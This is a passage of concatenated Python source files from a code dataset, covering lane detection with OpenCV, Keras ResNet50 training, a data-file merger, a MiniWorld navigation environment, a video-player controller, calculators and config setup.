np.absolute(sobel)\n scaled_sobel = np.uint8(255 * abs_sobel / np.max(abs_sobel))\n sbinary = np.zeros_like(scaled_sobel)\n sbinary[(scaled_sobel >= thresh[0]) & (scaled_sobel <= thresh[1])] = 1\n return sbinary\n\n\ndef mag_thresh(image, sobel_kernel=3, mag_thresh=(0, 255)):\n # Calculate gradient magnitude\n # Apply threshold\n gray = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY)\n\n sobelx = cv2.Sobel(gray, cv2.CV_64F, 1, 0, ksize=sobel_kernel)\n sobely = cv2.Sobel(gray, cv2.CV_64F, 0, 1, ksize=sobel_kernel)\n\n abs_sobel = np.sqrt(sobelx ** 2 + sobely ** 2)\n scaled_sobel = np.uint8(255 * abs_sobel / np.max(abs_sobel))\n\n magbinary = np.zeros_like(scaled_sobel)\n magbinary[(scaled_sobel >= mag_thresh[0]) & (scaled_sobel <= mag_thresh[1])] = 1\n\n return magbinary\n\n\ndef dir_threshold(image, sobel_kernel=3, thresh=(0, np.pi / 2)):\n # Calculate gradient direction\n # Apply threshold\n gray = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY)\n\n sobelx = cv2.Sobel(gray, cv2.CV_64F, 1, 0, ksize=sobel_kernel)\n sobely = cv2.Sobel(gray, cv2.CV_64F, 0, 1, ksize=sobel_kernel)\n\n abs_sobelx = np.absolute(sobelx)\n abs_sobely = np.absolute(sobely)\n\n direction = np.arctan2(abs_sobely, abs_sobelx)\n\n dirbinary = np.zeros_like(direction)\n dirbinary[(direction >= thresh[0]) & (direction <= thresh[1])] = 1\n\n return dirbinary\n\n\ndef gaussian_blur(img, kernel=5):\n # Function to smooth image\n blur = cv2.GaussianBlur(img,(kernel,kernel),0)\n return blur\n\n\ndef select_yellow(image_for_white):\n image_for_white = cv2.cvtColor(image_for_white, cv2.COLOR_RGB2BGR)\n lower = np.array([20, 60, 60])\n upper = np.array([38, 174, 250])\n mask = cv2.inRange(image_for_white, lower, upper)\n return mask\n\n\ndef select_white(image):\n lower = np.array([202, 202, 202])\n upper = np.array([255, 255, 255])\n mask = cv2.inRange(image, lower, upper)\n return mask\n\n\ndef comb_thresh(image):\n yellow = select_yellow(image)\n white = select_white(image)\n combined_binary = np.zeros_like(yellow)\n combined_binary[(yellow >= 1) | (white >= 1)] = 1\n return combined_binary\n\n\ndef generate_binary_image_old(image):\n ksize = 7\n hls = cv2.cvtColor(image, cv2.COLOR_RGB2HLS)\n s_channel = hls[:, :, 2]\n gradx = abs_sobel_thresh(image, orient='x', sobel_kernel=ksize, thresh=(30, 180))\n grady = abs_sobel_thresh(image, orient='y', sobel_kernel=ksize, thresh=(30, 180))\n mag_binary = mag_thresh(image, sobel_kernel=ksize, mag_thresh=(80, 150))\n dir_binary = dir_threshold(image, sobel_kernel=ksize, thresh=(0.7, 1.3))\n combined = np.zeros_like(dir_binary)\n combined[((gradx == 1) & (grady == 1)) | ((mag_binary == 1) & (dir_binary == 1))] = 1\n # Threshold color channel\n s_thresh_min = 170\n s_thresh_max = 255\n s_binary = np.zeros_like(s_channel)\n s_binary[(s_channel >= s_thresh_min) & (s_channel <= s_thresh_max)] = 1\n\n combined_binary = np.zeros_like(s_binary)\n combined_binary[(s_binary == 1) | (combined == 1)] = 1\n return combined_binary\n\n\ndef generate_binary_image(image):\n ksize = 7\n hls = cv2.cvtColor(image, cv2.COLOR_RGB2HLS)\n gradx = abs_sobel_thresh(image, orient='x', sobel_kernel=ksize, thresh=(30, 180))\n grady = abs_sobel_thresh(image, orient='y', sobel_kernel=ksize, thresh=(30, 180))\n mag_binary = mag_thresh(image, sobel_kernel=ksize, mag_thresh=(80, 150))\n dir_binary = dir_threshold(image, sobel_kernel=ksize, thresh=(0.7, 1.3))\n combined = np.zeros_like(dir_binary)\n combined[((gradx == 1) & (grady == 1)) | ((mag_binary == 1) & (dir_binary == 1))] = 1\n # Threshold color channel\n # s_thresh_min = 170\n 
# s_thresh_max = 255\n # s_binary = np.zeros_like(s_channel)\n # s_binary[(s_channel >= s_thresh_min) & (s_channel <= s_thresh_max)] = 1\n\n combined_binary = np.zeros_like(dir_binary)\n whiteyellowlines = comb_thresh(image)\n combined_binary[(whiteyellowlines == 1) | (combined == 1)] = 1\n return combined_binary\n\n\ndef color_sobel_combined(img):\n image_HLS = cv2.cvtColor(img, cv2.COLOR_RGB2HLS)\n\n img_L = image_HLS[:, :, 1]\n img_abs_x = abs_sobel_thresh(img_L, 'x', 5, (50, 225))\n img_abs_y = abs_sobel_thresh(img_L, 'y', 5, (50, 225))\n wraped_L = np.copy(cv2.bitwise_or(img_abs_x, img_abs_y))\n\n img_S = image_HLS[:, :, 2]\n img_abs_x = abs_sobel_thresh(img_S, 'x', 5, (50, 255))\n img_abs_y = abs_sobel_thresh(img_S, 'y', 5, (50, 255))\n wraped_S = np.copy(cv2.bitwise_or(img_abs_x, img_abs_y))\n\n image_cmb = cv2.bitwise_or(wraped_L, wraped_S)\n image_cmb = gaussian_blur(image_cmb, 25)\n\n yellow_white_combined = comb_thresh(img)\n\n image_cmb_color = np.zeros_like(image_cmb)\n image_cmb_color[(yellow_white_combined >= .5) | (image_cmb >= .5)] = 1\n gaussian_blur(image_cmb_color)\n return yellow_white_combined, image_cmb, image_cmb_color\n\n\ndef pos_of_vehicle(binary_image):\n xm_per_pix = 3.7 / 378\n car_position = binary_image.shape[1] / 2\n lane_center_position = (left_line.allx[719] + right_line.allx[719]) / 2\n center_dist = (car_position - lane_center_position) * xm_per_pix\n return center_dist\n\n\ndef pipeline(image):\n rows, cols, depth = image.shape\n undistorted_image = cv2.undistort(image, mtx, dist, None, mtx)\n undistorted_image = gaussian_blur(undistorted_image, kernel=5)\n M = cv2.getPerspectiveTransform(src_points, dest_points)\n warped_image = cv2.warpPerspective(undistorted_image, M, (cols, rows), flags=cv2.INTER_LINEAR)\n a, b, binary_image = color_sobel_combined(warped_image)\n find_lines(binary_image)\n mean_radius = (left_line.radius_of_curvature + right_line.radius_of_curvature) / 2.\n pos_of_car = pos_of_vehicle(binary_image)\n result = create_final_image(undistorted_image, binary_image, mean_radius, pos_of_car)\n\n # f, (ax1, ax2, ax3, ax4, ax5) = plt.subplots(1, 5, figsize=(24, 9))\n # f.tight_layout()\n # ax1.imshow(image)\n # ax1.set_title('Original Image', fontsize=30)\n # ax2.imshow(undistorted_image)\n # ax2.set_title('Undistorted Image', fontsize=30)\n # ax3.imshow(warped_image)\n # ax3.set_title('Warped Image', fontsize=30)\n # ax4.imshow(binary_image, cmap='gray')\n # ax4.set_title('Yellow White Binary Image', fontsize=15)\n # ax5.imshow(result, cmap='gray')\n # ax5.set_title('Result', fontsize=15)\n # plt.waitforbuttonpress()\n\n return result\n\n\n# import matplotlib.image as mpimg\n# im = mpimg.imread(\"../test_images/test5.jpg\")\n# pipeline(im)\n\n# import matplotlib.image as mpimg\n# import matplotlib.pyplot as plt\n# import glob\n# # test_image = mpimg.imread(\"../test_images/test5.jpg\")\n# images = glob.glob(\"../test_images/*.jpg\")\n# for image in images:\n# plt.imshow(pipeline(mpimg.imread(image)))\n# plt.waitforbuttonpress()\n# plt.close()\n\nvideo_output = '../output_videos/project_video_ouput.mp4'\nclip1 = VideoFileClip(\"../project_video.mp4\")\n\nwhite_clip = clip1.fl_image(pipeline)\nwhite_clip.write_videofile(video_output, audio=False)\n","sub_path":"lanefinding/lane_finding_video_pipeline.py","file_name":"lane_finding_video_pipeline.py","file_ext":"py","file_size_in_byte":15511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"155337853","text":"from os.path import 
join\n\nfrom keras.applications import ResNet50\nfrom keras.layers import GlobalAveragePooling2D, Dense, Dropout\nfrom keras.models import Model, load_model\nfrom keras.utils.np_utils import to_categorical\n\nimport pandas as pd\nimport csv\nimport os\nimport numpy as np\nimport json\n\nfrom matplotlib import pyplot as plt\nimport sys\nsys.path.append(\"../../data_preparation/\")\n\nfrom batch_generator import BatchGenerator, BatchSequence\n\nfrom sklearn.metrics import recall_score, precision_score, f1_score\n\n\n#datadir = os.getcwd()\ninput_path = os.path.abspath('../../../mlipdata/')\n\ntrain={}\ntest={}\nvalidation={}\nwith open(os.path.join(input_path, 'train.json')) as json_data:\n train= json.load(json_data)\nwith open(os.path.join(input_path, 'test.json')) as json_data:\n test= json.load(json_data)\nwith open(os.path.join(input_path, 'validation.json')) as json_data:\n validation = json.load(json_data)\n\nprint('Train No. of images: %d'%(len(train['images'])))\nprint('Test No. of images: %d'%(len(test['images'])))\nprint('Validation No. of images: %d'%(len(validation['images'])))\n\n# JSON TO PANDAS DATAFRAME\n# train data\ntrain_img_url=train['images']\ntrain_img_url=pd.DataFrame(train_img_url)\ntrain_ann=train['annotations']\ntrain_ann=pd.DataFrame(train_ann)\ntrain=pd.merge(train_img_url, train_ann, on='imageId', how='inner')\n\n# test data\ntest=pd.DataFrame(test['images'])\n\n# Validation Data\nval_img_url=validation['images']\nval_img_url=pd.DataFrame(val_img_url)\nval_ann=validation['annotations']\nval_ann=pd.DataFrame(val_ann)\nvalidation=pd.merge(val_img_url, val_ann, on='imageId', how='inner')\n\ndatas = {'Train': train, 'Test': test, 'Validation': validation}\nfor data in datas.values():\n data['imageId'] = data['imageId'].astype(np.uint32)\n \n \nimages_path_train = os.path.abspath('../../../mlipdata/files/train/')\n\nfrom sklearn.preprocessing import MultiLabelBinarizer\nmlb = MultiLabelBinarizer()\n# loading labels\ny_train = np.array(train.labelId)\ny_validation = np.array(validation.labelId)\n\ny_train1000 = mlb.fit_transform(y_train)[:1000]\ny_validation500 = mlb.fit_transform(y_validation)[:500]\n\n# load the generator\ntraining_gen = BatchGenerator(input_dir=images_path_train, y=y_train1000, batch_size=64)\n\nbase_model = ResNet50(weights='imagenet', include_top=False, input_shape=(290,290,3))\n\n# Adding the last two fully-connected layers\nx = base_model.output\nx = GlobalAveragePooling2D()(x) # global average pooling (flatten)\nx = Dense(1024, activation='relu')(x) # should be rather large with 228 output labels\n#x = Dropout(0.5)(x)\ny = Dense(228, activation='softmax')(x) # sigmoid instead of softmax to have independent probabilities\n\nmodel = Model(inputs=base_model.input, outputs=y)\n# Train only the top layer\nfor layer in base_model.layers:\n layer.trainable = False\n \n# Use binary loss instead of categorical loss to penalize each output independently\nmodel.compile(optimizer='adam', loss='binary_crossentropy')\n\n# 1000 steps = 640000 random images per epoch\nmodel.fit_generator(training_gen, steps_per_epoch=100, epochs=10)\n\nmodel.save('./ResNet50.h5')","sub_path":"pretrained_network/Pretrained-networks/ResNet50/ResNet50.py","file_name":"ResNet50.py","file_ext":"py","file_size_in_byte":3096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"585568921","text":"import csv\nimport json\nimport xml.etree.ElementTree as ET\n\n\ndef read_csv(file_name,array):\n try:\n with open(file_name) as 
csvfile:\n data = csv.DictReader(csvfile)\n for row in data:\n array.append(dict(row))\n except OSError:\n print (\"Cannot open:\", file_name)\n\n\ndef read_json(file_name,array):\n try:\n with open(file_name) as jsonfile:\n json_data = json.load(jsonfile)\n for dict in json_data.get('fields'):\n array.append(dict)\n except OSError:\n print (\"Cannot open:\", file_name)\n\n\ndef read_xml(file_name,array):\n try:\n open(file_name)\n xml_data = {}\n tree = ET.parse(file_name)\n root = tree.getroot()\n for child in root:\n for object in child:\n for value in object:\n xml_data[(object.get('name'))] = value.text\n array.append(xml_data)\n except OSError:\n print (\"Cannot open:\", file_name)\n\n\ndef filter(old_data, new_data, keys):\n for odict in old_data:\n filterDict = {key:value for (key,value) in odict.items() \n if key in keys}\n newDict = {key:(value if key.startswith('D') else int(value)) \n for (key,value) in filterDict.items()}\n new_data.append(newDict)\n\n\ndef save_table(table, keys, file_name):\n with open(file_name, 'w', newline='') as output_file:\n dict_writer = csv.DictWriter(output_file, keys, delimiter=\" \")\n dict_writer.writeheader()\n dict_writer.writerows(table)\n\n\ndef main():\n result_data = []\n # Getting files\n while True:\n print(\"Input file name:\")\n file_name = input()\n more_files = False\n\n if (file_name.endswith('csv')):\n read_csv(file_name,result_data)\n elif (file_name.endswith('json')):\n read_json(file_name,result_data)\n elif (file_name.endswith('xml')):\n read_xml(file_name,result_data)\n else:\n print(\"Chosen file format is not supported!\")\n\n proceed = False\n while (proceed == False):\n print(\"That's all? (yes/no)\")\n response = input()\n if (response == 'yes'):\n proceed = True\n more_files = False\n elif (response == 'no'):\n proceed = True\n more_files = True\n else:\n proceed = False\n\n if (more_files == False):\n break\n\n # Getting keys\n print(\"Input value n for D:\")\n Dn = int(input())\n keysD = []\n keysM = []\n for i in range(1, Dn+1):\n keysD.append(('D'+str(i)))\n\n print(\"Input value n for M:\")\n Mn = int(input())\n for i in range(1, Mn+1):\n keysM.append(('M'+str(i)))\n \n keys = keysD + keysM\n\n # Filtering data\n filtered_data = []\n filter(result_data, filtered_data, keys)\n\n # Sorting data\n filtered_data = sorted(filtered_data, key = lambda k: k['D1'])\n \n # Saving data\n save_table(filtered_data, keys, 'basic_results.tsv')\n print(\"Data succesfully saved in basic_results.csv\")\n\n # Advanced\n advanced_data = []\n advanced_data.append(filtered_data[0])\n\n for i in range(1, len(filtered_data)):\n current_dict = filtered_data[i]\n current_dict_Dval = [current_dict.get(key) for key in keys \n if key.startswith('D')]\n for k in range(0, len(advanced_data)):\n previous_dict = advanced_data[k]\n previous_dict_Dval = [previous_dict.get(key) for key in keys \n if key.startswith('D')]\n if (current_dict_Dval == previous_dict_Dval):\n previous_dict_keys = [previous_dict]\n for key in keysM:\n advanced_data[k][key] = (int(advanced_data[k].get(key) or 0) \n + int(current_dict.get(key) or 0))\n break\n else:\n advanced_data.append(current_dict)\n\n save_table(advanced_data, keys, 'advanced_results.tsv')\n print(\"Data succesfully saved in advancedc_results.csv\")\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"python_app.py","file_name":"python_app.py","file_ext":"py","file_size_in_byte":4200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} 
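For reference, the grouped aggregation in python_app.py above (a linear scan over advanced_data comparing D-values row by row) can be expressed more directly with a dictionary keyed on the D-values. A minimal sketch under the same assumptions as that script (rows are dicts with 'D1'..'Dn' keys and integer-like 'M1'..'Mn' values, missing M-values counting as 0); the helper name aggregate_by_d is hypothetical, not part of the corpus record:

def aggregate_by_d(rows, keysD, keysM):
    # Hypothetical helper, not from the record above.
    # Group rows by their tuple of D-values; sum the M-values within each group.
    grouped = {}
    for row in rows:
        key = tuple(row.get(k) for k in keysD)
        if key not in grouped:
            grouped[key] = dict(row)
        else:
            for m in keysM:
                grouped[key][m] = (int(grouped[key].get(m) or 0)
                                   + int(row.get(m) or 0))
    return list(grouped.values())

This replaces the quadratic inner scan with a single pass and avoids mutating the list that is being iterated.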
+{"seq_id":"486471815","text":"from .base import *\n\nDEBUG = False\nALLOWED_HOSTS = ['selling-online-overseas.export.staging.uktrade.io']\nADMINS = (('David Downes', 'david@downes.co.uk'),)\n\nRESTRICT_IPS = True\nALLOW_AUTHENTICATED = True\nALLOW_ADMIN = True\n\nSESSION_COOKIE_SECURE = False\nCSRF_COOKIE_SECURE = False\n","sub_path":"navigator/settings/staging.py","file_name":"staging.py","file_ext":"py","file_size_in_byte":281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"344647111","text":"import numpy as np\nimport math\nfrom gym import spaces\nfrom ..miniworld import MiniWorldEnv, Room\nfrom ..entity import Box, Ball, Key, Medkit, Cone, Building, Duckie\n\n# obs_width=80,\n# obs_height=60,\n# window_width=800,\n# window_height=600,\n\nclass Navigation(MiniWorldEnv):\n \"\"\"\n Room with multiple objects. The agent collects +1 reward for picking up\n each object. Objects disappear when picked up.\n \"\"\"\n\n def __init__(self, size=20, num_objs=5, **kwargs):\n assert size >= 2\n self.size = size\n self.num_objs = num_objs\n \n # Entity in the env\n self.ent_list = []\n\n super().__init__(\n max_episode_steps=400, obs_width = 128, obs_height = 128, window_width = 1280, window_height = 1280,\n **kwargs\n )\n\n # Reduce the action space\n self.action_space = spaces.Discrete(self.actions.move_back+1)\n \n\n\n def _gen_world(self):\n \n self.ent_list = []\n \n room = self.add_rect_room(\n min_x=0,\n max_x=self.size,\n min_z=0,\n max_z=self.size,\n wall_tex='brick_wall',\n floor_tex='asphalt',\n no_ceiling=True,\n )\n \n \n # Generate walls\n for i in range(3):\n #obj_type = self.rand.choice(obj_types)\n color = self.rand.color()\n ent = self.place_entity(Box(color=color, size=[0.2,2,6]))\n self.ent_list.append(ent)\n \n \n # Generate special objects\n obj_types = [Ball, Key, Medkit, Cone, Building, Duckie]\n\n for obj in range(self.num_objs):\n obj_type = self.rand.choice(obj_types)\n color = self.rand.color()\n\n if obj_type == Box:\n ent = self.place_entity(Box(color=color, size=[0.2,2,8]))\n #print(ent.pos)\n #print(ent.dir)\n if obj_type == Ball:\n ent = self.place_entity(Ball(color='blue'))\n if obj_type == Key:\n ent = self.place_entity(Key(color='yellow'))\n if obj_type == Building:\n ent = self.place_entity(Building(color='yellow'))\n if obj_type == Cone:\n ent = self.place_entity(Cone(color='yellow'))\n if obj_type == Medkit:\n ent = self.place_entity(Medkit(color='yellow'))\n if obj_type == Duckie:\n ent = self.place_entity(Duckie(color='yellow'))\n #self.ent_list.append(ent)\n \n \n ent = self.place_agent()\n self.ent_list.append(ent)\n \n #print('agent pos and dir:')\n #print(ent.pos)\n #print(ent.dir)\n\n self.num_picked_up = 0\n\n def step(self, action):\n obs, reward, done, info = super().step(action)\n \n info['ent_list'] = self.ent_list\n\n if self.agent.carrying:\n self.entities.remove(self.agent.carrying)\n self.agent.carrying = None\n self.num_picked_up += 1\n reward = 1\n\n if self.num_picked_up == self.num_objs:\n done = True\n\n return obs, reward, done, info\n","sub_path":"gym_miniworld/envs/navigation.py","file_name":"navigation.py","file_ext":"py","file_size_in_byte":3226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"385831415","text":"from threading import Thread\nfrom queue import Queue\nimport subprocess\n\nfrom pyautomator import BaseController, prompt\n\n\nclass VideoPlayerThread(Thread):\n def __init__(self, configuration, queue):\n 
Thread.__init__(self)\n self.configuration = configuration\n self.queue = queue\n self.player_process = None\n\n def run(self):\n while True:\n url = self.queue.get()\n\n if self.player_process:\n self.player_process.terminate()\n self.player_process = None\n\n if url:\n self.player_process = subprocess.Popen([\n self.configuration.player_path, self.configuration.get_options(),\n url, self.configuration.player_location]\n )\n\n\nclass VideoController(BaseController):\n class VideoPlayerConfiguration():\n def __init__(self, player_path='/home/pi/omxplayer-sync/omxplayer-sync',\n player_location='', master=True, slave=False):\n self.player_path = player_path\n self.player_location = player_location\n self.master = master\n self.slave = slave\n\n def set_master(self):\n self.master = True\n self.slave = False\n\n def set_slave(self):\n self.master = False\n self.slave = True\n\n def set_fullscreen(self):\n self.player_location = ''\n\n def get_options(self):\n opt = '-'\n if self.master:\n opt += 'm'\n else:\n opt += 'l'\n return opt\n\n def __init__(self):\n self.configuration = VideoController.VideoPlayerConfiguration(player_location='--win 395,360,1525,1050')\n self.player_thread = None\n self.player_queue = Queue()\n\n def get_mapping(self):\n mapping = {\n 'health': lambda: self.health(),\n 'play': lambda url, configuration: self.play(url, configuration),\n 'stop': lambda : self.stop(),\n }\n\n return mapping\n\n def play(self, url, options={}):\n if options.get('master', False):\n self.configuration.set_master()\n else:\n self.configuration.set_slave()\n\n if options.get('fullscreen', False):\n self.configuration.set_fullscreen()\n else:\n self.configuration.player_location='--win 395,360,1525,1050'\n\n if not self.player_thread:\n self.player_thread = VideoPlayerThread(self.configuration, self.player_queue)\n self.player_thread.start()\n self.player_queue.put(url)\n\n return \"Player started\"\n\n def stop(self):\n self.player_queue.put(None)\n\nif __name__ == '__main__':\n prompt(VideoController())\n","sub_path":"automator.py","file_name":"automator.py","file_ext":"py","file_size_in_byte":2766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"347857398","text":"print(\"The current operands are Multiplication() Subtraction() Addition() Division() Exponent()\")\r\n\r\nMultiplication = (\"Multiplication ()\")\r\nSubtraction = (\"Subtraction ()\")\r\nAddition = (\"Addition ()\")\r\nDivision = (\"Division ()\")\r\nExponent = (\"Exponent ()\")\r\n\r\ndef Multiplication():\r\n print (\"Enter two numbers and I will multiply them\")\r\n\r\n # First variable\r\n astring = input (\"Enter the first number: \")\r\n a = int (astring)\r\n # Second variable\r\n bstring = input (\"Enter a second number: \")\r\n b = int (bstring)\r\n # Prints the output of the two numbers\r\n print (a, \"times\", b, \"equals\", a*b)\r\n \r\ndef Subtraction():\r\n print (\"Enter two numbers and I will subtract them\")\r\n\r\n # First variable\r\n cstring = input (\"Enter the first number: \")\r\n c = int (cstring)\r\n # Second variable\r\n dstring = input (\"Enter a second number: \")\r\n d = int (dstring)\r\n # Prints the output of the two numbers\r\n print (\"The difference of\", c, \"and\", d, \"is\", c-d)\r\n\r\ndef Addition():\r\n print (\"Enter two numbers and I will add them\")\r\n\r\n # First variable\r\n estring = input (\"Enter the first number: \")\r\n e = int (estring)\r\n # Second variable\r\n fstring = input (\"Enter a second number: \")\r\n f = int 
(fstring)\r\n # Prints the output of the two numbers\r\n print (\"The sum of\", e, \"and\", f, \"is\", e+f)\r\n \r\ndef Division():\r\n print (\"Enter two numbers and I will divide them\")\r\n\r\n # First variable\r\n gstring = input (\"Enter the first number: \")\r\n g = int (gstring)\r\n # Second variable\r\n hstring = input (\"Enter a second number: \")\r\n h = int (hstring)\r\n # Prints the output of the two numbers\r\n print (g, \"divided by\", h, \"is\", g/h)\r\n\r\ndef Exponent():\r\n print (\"Enter two numbers and I will time them by the exponent\")\r\n\r\n # First variable\r\n istring = input (\"Enter the exponent: \")\r\n i = int (istring)\r\n # Second variable\r\n jstring = input (\"Enter the second value: \")\r\n j = int (jstring)\r\n # Prints the output of the two numbers\r\n print (\"The exponent\", j, \"times\", i, \"is\", j**i)\r\n \r\n","sub_path":"Number.py","file_name":"Number.py","file_ext":"py","file_size_in_byte":2160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"239374695","text":"# Copyright 2015 Huawei Technologies Co., Ltd.\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\n\"\"\"\nRoutines for configuring tricircle, largely copy from Neutron\n\"\"\"\nimport sys\n\nfrom oslo_config import cfg\nimport oslo_log.log as logging\nfrom oslo_policy import opts as policy_opts\n\nfrom tricircle.common import policy\nfrom tricircle.common import rpc\nfrom tricircle.common import version\n\n\nlogging.register_options(cfg.CONF)\nLOG = logging.getLogger(__name__)\n\npolicy_opts.set_defaults(cfg.CONF, 'policy.json')\n\n\ndef init(opts, args, **kwargs):\n # Register the configuration options\n cfg.CONF.register_opts(opts)\n\n cfg.CONF(args=args, project='tricircle',\n version=version.version_info,\n **kwargs)\n\n _setup_logging()\n _setup_policy()\n\n rpc.init(cfg.CONF)\n\n\ndef _setup_logging():\n \"\"\"Sets up the logging options for a log with supplied name.\"\"\"\n product_name = \"tricircle\"\n logging.setup(cfg.CONF, product_name)\n LOG.info(\"Logging enabled!\")\n LOG.info(\"%(prog)s version %(version)s\",\n {'prog': sys.argv[0],\n 'version': version.version_info})\n LOG.debug(\"command line: %s\", \" \".join(sys.argv))\n\n\ndef _setup_policy():\n\n # if there is valid policy file, use policy file by oslo_policy\n # otherwise, use the default policy value in policy.py\n policy_file = cfg.CONF.oslo_policy.policy_file\n if policy_file and cfg.CONF.find_file(policy_file):\n # just return here, oslo_policy lib will use policy file by itself\n return\n\n policy.populate_default_rules()\n\n\ndef reset_service():\n # Reset worker in case SIGHUP is called.\n # Note that this is called only in case a service is running in\n # daemon mode.\n _setup_logging()\n\n policy.reset()\n _setup_policy()\n","sub_path":"tricircle/common/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} 
+{"seq_id":"653023386","text":"import tkinter as tk\n\n\nclass MyButtons:\n\n def __init__(self, master):\n frame = tk.Frame(master)\n frame.pack()\n\n self.printButton = tk.Button(frame, text=\"Print Message\", command=self.printMessage)\n self.printButton.pack(side=tk.LEFT)\n\n self.quitButton = tk.Button(frame, text=\"Quit\", command=frame.quit)\n self.quitButton.pack(side=tk.LEFT)\n\n def printMessage(self):\n print('This things works!!!')\n\n\nroot = tk.Tk()\nbyButts = MyButtons(root)\n\nroot.mainloop()","sub_path":"tk6.py","file_name":"tk6.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"132991881","text":"import re\n\npattern = r\"([\\w\\.-]+)@([\\w\\.-]+)(\\.[\\w\\.]+)\"\nstring = \"Please contact info@sololearn.com for assistance\"\n\nmatch = re.search(pattern, string)\nif match:\n\tprint(match.group())\n\n# In case the string contains multiple email addresses,\n# we could use the re.findall method instead of re.search,\n# to extract all email addresses.\n","sub_path":"regExp/email_extraction.py","file_name":"email_extraction.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"53908020","text":"from tkinter import Tk\nfrom tkinter import ttk\nfrom tkinter import StringVar\n\nfrom pyperclip import copy as to_clipboard\n\nfrom storage import Storage\nfrom core_logic import Calculate\n\n\nclass GUI(Tk):\n\n __operators: list = ['/', '*', '+', '-']\n\n def __init__(self):\n ''' View initializer '''\n super().__init__()\n # Main window properties\n self.title(\"PyCalc (v1.1)\")\n self.resizable(False, False)\n self.styler = ttk.Style()\n self._layout = ['*', '/', 'C', 'AC',\n '9', '8', '7', '-',\n '6', '5', '4', '+',\n '3', '2', '1', '+/-',\n '.', '0', 'Copy', '=']\n self._adv_layout = ['(', ')', '^', 'C',\n '*', 'sin', 'cos', 'tan',\n '/', 'asin', 'acos', 'atan',\n '+', 'x!', 'log', 'ln',\n '-', '\\u03C0', 'e', '=']\n\n # Inheriting from Storage for program logic\n self.logic = Storage()\n # Set General layout\n self.content = ttk.Notebook(master=self,\n padding=(0, 0, 0, 0),\n style='Outliner.TFrame')\n self.mainframe = ttk.Frame(self.content,\n relief='flat')\n self.mainframe2 = ttk.Frame(self.content)\n self.content.add(self.mainframe, text='Basic')\n self.content.add(self.mainframe2, text='Advanced')\n self.content.grid()\n self.label_text = StringVar()\n\n def default_style_settings(self):\n self.styler.configure(\"TLabel\",\n font='Times 20')\n self.styler.configure(\"TButton\",\n relief='flat',\n width='5',\n padding='10',\n background='bisque')\n self.styler.configure(\"EqualButton.TButton\",\n relief='falt',\n background='SeaGreen2',\n foreground='green4')\n self.styler.configure(\"EqualButton2.TButton\",\n relief='flat',\n background='firebrick1',\n foreground='green4')\n self.styler.configure(\"Outliner.TFrame\",\n background='snow2')\n\n def create_basic_display(self):\n ''' Create the display '''\n display_frame = ttk.Frame(self.mainframe, relief='flat')\n display_frame['borderwidth'] = 10\n display_label = ttk.Label(display_frame,\n textvariable=self.label_text)\n # grid above widgets\n display_frame.grid(row=0, column=0, columnspan=4, pady=5, padx=5)\n display_label.grid(row=0, column=0, columnspan=4)\n\n def create_basic_buttons(self):\n ''' Create buttons under keypad '''\n keypad = ttk.Frame(self.mainframe)\n button_objects = {\n button: ttk.Button(\n master=keypad,\n 
text=button,\n                command=lambda button=button: self._button_invoke(\n                    button\n                )\n            )\n            for button in self._layout\n        }\n        button_objects['AC']['command'] = lambda: self._button_invoke('A')\n        button_objects['+/-']['command'] = lambda: self._button_invoke('i')\n        button_objects['=']['style'] = 'EqualButton.TButton'\n\n        keypad.grid()\n        row, column = 0, 0\n        for button in button_objects.values():\n            button.grid(row=(row//4)+1, column=column % 4)\n            row += 1\n            column += 1\n\n    def create_advanced_display(self):\n        display_frame = ttk.Frame(self.mainframe2, relief='flat')\n        display_frame['borderwidth'] = 10\n        display_label = ttk.Label(display_frame,\n                                  textvariable=self.label_text)\n        # grid above widgets\n        display_frame.grid(row=0, column=0, columnspan=4, pady=5, padx=5)\n        display_label.grid(row=0, column=0, columnspan=4)\n\n    def create_advanced_buttons(self):\n        keypad = ttk.Frame(self.mainframe2)\n        button_objects = {\n            button: ttk.Button(\n                master=keypad,\n                text=button,\n                command=lambda button=button: self._button_invoke(\n                    button)\n            )\n            for button in self._adv_layout\n        }\n        button_objects['=']['style'] = 'EqualButton2.TButton'\n\n        keypad.grid()\n        row, column = 0, 0\n        for button in button_objects.values():\n            button.grid(row=(row//4)+1, column=column % 4)\n            row += 1\n            column += 1\n\n    def _button_invoke(self, bt):\n        if bt == '=':\n            # '=' evaluates the expression accumulated in storage\n            to_display = 'Ans: '+self._get_answer(\n                self.logic.show_storage_as_list()\n            )\n            if(len(to_display) > 17):\n                FONT = 'Times '+str(20*17//len(to_display))\n                ttk.Style().configure(\"TLabel\", font=FONT)\n            else:\n                ttk.Style().configure(\"TLabel\", font='Times 20')\n            self.label_text.set(to_display)\n        elif bt == 'Copy':\n            self._copy_to_clipboard(self.logic.show_storage_as_list())\n        else:\n            self.logic.into_storage(bt)\n            to_display = self.logic.show_storage()\n            if(len(to_display) > 17):\n                FONT = 'Times '+str(20*17//len(to_display))\n                ttk.Style().configure(\"TLabel\", font=FONT)\n         